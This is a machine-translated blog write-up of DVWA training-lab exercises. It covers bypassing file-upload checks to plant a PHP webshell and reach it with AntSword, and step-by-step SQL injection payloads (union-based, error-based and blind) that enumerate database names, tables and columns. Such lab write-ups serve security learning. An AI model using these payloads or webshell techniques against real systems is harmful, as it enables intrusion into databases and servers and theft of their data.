当前位置:网站首页>DVWA range exercise 4
DVWA range exercise 4
2022-07-04 12:40:00 【chenjyboke】
file upload( Upload files )
low
File upload vulnerability , Usually due to the type of upload file , The content is not strictly filtered , Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache,Tomcat,Nginx And so on are exposed file upload vulnerabilities .
Check the source code and find that there are no restrictions on the content of file types. Check for file upload vulnerabilities .
Make a word Trojan , The file format is php Upload files . Connect with an ant sword . Backstage .
Mdeium
Check the source code and find that the file type limit should be jepg Or for png
Edit a sentence: the Trojan horse is jpg Format upload , Use burp Capture the package and change the file format to php Format , After success, use ant sword to connect
SQL injection(sql Inject )
low
1、 Determine the type of Injection
Input 1 success , Input 1 and1=1 success Input 1’ Failure
It is judged as digital injection
2、 guess sql The number of fields in the query statement
Input 1’ order by 2# success Input 1’ order by 3# Failure , Determine that the number of fields is 2
3、 Get users , database , Version number
Input 1' union select 1,concat(user(),database(),version())#
4, Gets the tables in the database
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
medium
1. After submission burp Grab the bag , modify id=1 Change it to 1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #
Check in the response package
Repeat the above steps
2. Number of blasting tables : id=1 Change it to 1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
3. Name of blasting table : id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
4. Blast users Field name
id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#
SQL injection(sql Injection blind injection )
Determine the injection type and sql Inject the same
Judge the length of the database
Input 1’ and length(database())=1 #, Show that there is no ;
Input 1’ and length(database())=2 #, Show that there is no ;
Input 1’ and length(database())=3 #, Show that there is no ;
Input 1’ and length(database())=4 #, Show the presence of :
边栏推荐
- [the way of programmer training] - 2 Perfect number calculation
- Global and Chinese market of piston rod 2022-2028: Research Report on technology, participants, trends, market size and share
- . Does net 4 have a built-in JSON serializer / deserializer- Does . NET 4 have a built-in JSON serializer/deserializer?
- MPLS experiment
- MySQL performance optimization index
- World document to picture
- 13、 C window form technology and basic controls (3)
- The solution of permission denied
- C语言:围圈报号排序问题
- BCD code Baidu Encyclopedia
猜你喜欢
Entitas learning [3] multi context system
How to use "bottom logic" to see the cards in the world?
Leetcode: 408 sliding window median
Lecture 9
R语言--readr包读写数据
Source code analysis of the implementation mechanism of multisets in guava class library
17. Memory partition and paging
Introduction to the button control elevatedbutton of the fleet tutorial (the tutorial includes the source code)
C語言函數
Fastlane 一键打包/发布APP - 使用记录及踩坑
随机推荐
Anti clockwise rotation method of event arrangement -- PHP implementation
The most robust financial products in 2022
Wechat video Number launches "creator traffic package"
JD home programmers delete databases and run away. Talk about binlog, the killer of MySQL data backup
[ES6] template string: `string`, a new symbol in es2015
C语言数组
Show recent errors only command /bin/sh failed with exit code 1
0x15 string
Globalsign's SSL certificate products
MySQL performance optimization index
Global and Chinese markets of digital PCR and real-time PCR 2022-2028: Research Report on technology, participants, trends, market size and share
How to use "bottom logic" to see the cards in the world?
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 15
Data communication and network: ch13 Ethernet
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 16
Introduction to the button control elevatedbutton of the fleet tutorial (the tutorial includes the source code)
Entitas learning [iv] other common knowledge points
Clockwise rotation method of event arrangement -- PHP implementation
C语言:求字符串的长度
17. Memory partition and paging